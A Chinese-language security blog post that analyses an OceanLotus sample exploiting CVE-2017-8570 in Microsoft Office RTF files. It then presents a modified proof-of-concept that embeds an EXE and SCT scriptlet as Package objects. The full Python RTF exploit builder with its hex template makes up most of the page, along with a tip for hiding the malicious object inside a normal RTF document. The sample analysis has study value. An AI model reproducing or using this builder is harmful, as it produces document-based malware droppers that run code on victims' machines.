CVE-2017-8570及利用样本分析
时间:2022-07-23
本文章向大家介绍CVE-2017-8570及利用样本分析,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
CVE-2017-8570及利用样本分析
注意事项:1.本文由Gcow安全团队复眼小组的ERFZE师傅原创,未经许可禁止转载2.本文一共1100多字,13张图,预计阅读时间8分钟3.文中提及的方法仅供参考学习,若用在实际情况而造成的损失,本团队以及本公众号概不负责4.本篇文章的漏洞原理不是重点,主要在于利用.所以再本篇文章中提到的漏洞原理的篇幅较少5.若本篇文章中存在说得有错误或者模糊的环节,希望各位看官可以在后台留言或者评论指出,本小组不胜感激!0x01 漏洞概述:
CVE-2017-8570实际上是一逻辑漏洞,该漏洞利用了OLE中Composite Moniker对象在组合File Moniker对象的过程中,未做安全性检查,以致可以直接运行File Moniker对象指定的ScriptletFile(.sct)脚本文件。
0x02 样本分析:
以海莲花组织某样本作为示例。
MD5:72bebba3542bd86dc68a36fda5dbae76
使用rtfdump工具-f O选项过滤RTF文档中的OLE对象:
图片1 rtfdump
之后结合rtfobj分析结果判断其.sct脚本文件位于第213号对象中:
图片2 rtfobj
通过-s 213 -H进行验证:
图片3 sct脚本文件
之后使用输出重定向将结果保存到一文本文件中:
图片4 保存输出结果
最后由awk命令结合正则表达式将其中的脚本内容提取出来:
图片5 提取脚本内容
注:此时可以使用Notepad++或者Sublime对脚本内容进行排版处理,以便阅读:
图片6 排版后
其功能为执行释放到临时目录下的VBS脚本文件。
0x03 样本构造:
部分样本是将EXE文件以Package对象的形式包含在RTF文档内:
图片7 EXE
之后通过SCT脚本去执行该EXE:
图片8 SCT脚本
笔者针对此情况对原有POC进行了改造(完整内容见文末):
图片9 修改一
图片10 修改二
图片11 修改三
如此一来,便可将EXE文件以Package对象的形式嵌入到RTF文档中。
生成的RTF文档可以添加到正常RTF文档末尾}之前以进行伪装:
图片12 伪装
笔者用以测试的SCT脚本如下:
<?XML version="1.0"?><scriptlet>
<registration description="fjzmpcjvqp" progid="fjzmpcjvqp" version="1.00" classid="{204774CF-D251-4F02-855B-2BE70585184B}" remotable="true" ></registration>
<script language="JScript"><![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("%temp%\write.exe");
]]></script>
</scriptlet>其中write.exe是C:WindowsSystem32目录下的正常写字板程序。效果如图:
图片13 效果图
0x04 POC:
import argparseimport osimport structimport randomimport string
class Package(object): """ Packager spec based on: https://phishme.com/rtf-malware-delivery/
Dropping method by Haifei Li: https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
Found being used itw by @MalwareParty: https://twitter.com/MalwareParty/status/943861021260861440 """ def __init__(self, filename,rand): if rand == True: self.filename = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(15)) + ".sct" else: self.filename = filename self.fakepath = 'C:\fakepath\{}'.format(self.filename)
self.orgpath = self.fakepath self.datapath = self.fakepath
with open(filename,'rb') as f: self.data = f.read()
self.OBJ_HEAD = r"{objectobjembobjw1objh1{*objclass Package}{*objdata " self.OBJ_TAIL = r"0105000000000000}}"
def get_object_header(self): OLEVersion = '01050000' FormatID = '02000000' ClassName = 'Package' szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex') szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex')
return ''.join([ OLEVersion, FormatID, szClassName, ClassName.encode('hex') + '00', '00000000', '00000000', szPackageData, ])
def get_package_data(self): StreamHeader = '0200' Label = self.filename.encode('hex') + '00' OrgPath = self.orgpath.encode('hex') + '00' UType = '00000300' DataPath = self.datapath.encode('hex') + '00' DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex') DataLen = struct.pack("<I", len(self.data)).encode('hex') Data = self.data.encode('hex') OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex') OrgPathW = self.datapath.encode('utf-16le').encode('hex') LabelLen = struct.pack("<I", len(self.filename)).encode('hex') LabelW = self.filename.encode('utf-16le').encode('hex') DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex') DefPathW = self.orgpath.encode('utf-16le').encode('hex')
return ''.join([ StreamHeader, Label, OrgPath, UType, DataPathLen, DataPath, DataLen, Data, OrgPathWLen, OrgPathW, LabelLen, LabelW, DefPathWLen, DefPathW, ])
def build_package(self): return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释
* # Bypassing CVE-2017-0199 patch with Composite Moniker: https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.htmlEXPLOIT_RTF = r"""{{rt{0}{1}{{objectobjautlinkobjupdate{{*objclass Word.Document.8}}{{*objdata 0105000002000000090000004F4C45324C696E6B000000000000000000000A0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFFFEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF020000000003000000000000C000000000000046000000000000000000000000704D6CA637B5D20103000000000200000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000100100000000000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000060000000000000003004C0069006E006B0049006E0066006F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000005000000B700000000000000010000000200000003000000FEFFFFFFFEFFFFFF0600000007000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020900000001000000000000000000000000000000C00000000903000000000000C000000000000046020000000303000000000000C00000000000004600001A00000025544D50255C{2}000E00ADDE000000000000000000000000000000000000000038000000320000000300250054004D00500025005C00{3}C6AFABEC197FD211978E0000F8757E2A000000000000000000000000000000000000000000000000FFFFFFFF0609020000000000C00000000000004600000000FFFFFFFF0000000000000000906660A637B5D201000000000000000000000000000000000000000000000000100203000D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}}"""
*/
def build_exploit(sct,exe): sct_p = Package(sct,rand=True) sct_package = sct_p.build_package() exe_p = Package(exe,rand=False) exe_package = exe_p.build_package() return EXPLOIT_RTF.format(exe_package,sct_package, sct_p.filename.encode('hex'), sct_p.filename.encode('utf-16le').encode('hex'))
if __name__ == '__main__': parser = argparse.ArgumentParser(description="PoC exploit for CVE-2017-8750 (a.k.a. "composite moniker") using Packager.dll file drop method") parser.add_argument("-s", "--sct", help="Sct file to execute", required=True) parser.add_argument("-e", "--exe", help="Exe file", required=True) parser.add_argument('-o', "--output", help="Output file for RTF", required=True)
args = parser.parse_args()
with open(args.output, 'w') as f: f.write(build_exploit(args.sct,args.exe)) print "[+] RTF file written to: {}".format(args.output)0x05 参考链接:
•需要用于多行搜索的正则表达式(grep)(https://www.it-swarm.dev/zh/regex/%E9%9C%80%E8%A6%81%E7%94%A8%E4%BA%8E%E5%A4%9A%E8%A1%8C%E6%90%9C%E7%B4%A2%E7%9A%84%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%EF%BC%88grep%EF%BC%89/970994208/)•CVE-2017-8570首次公开的野外样本及漏洞分析(https://paper.seebug.org/520)•Analysis of a CVE-2017-0199 Malicious RTF Document(https://blog.nviso.eu/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/)•CVE-2017-8570(https://github.com/rxwx/CVE-2017-8570)
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法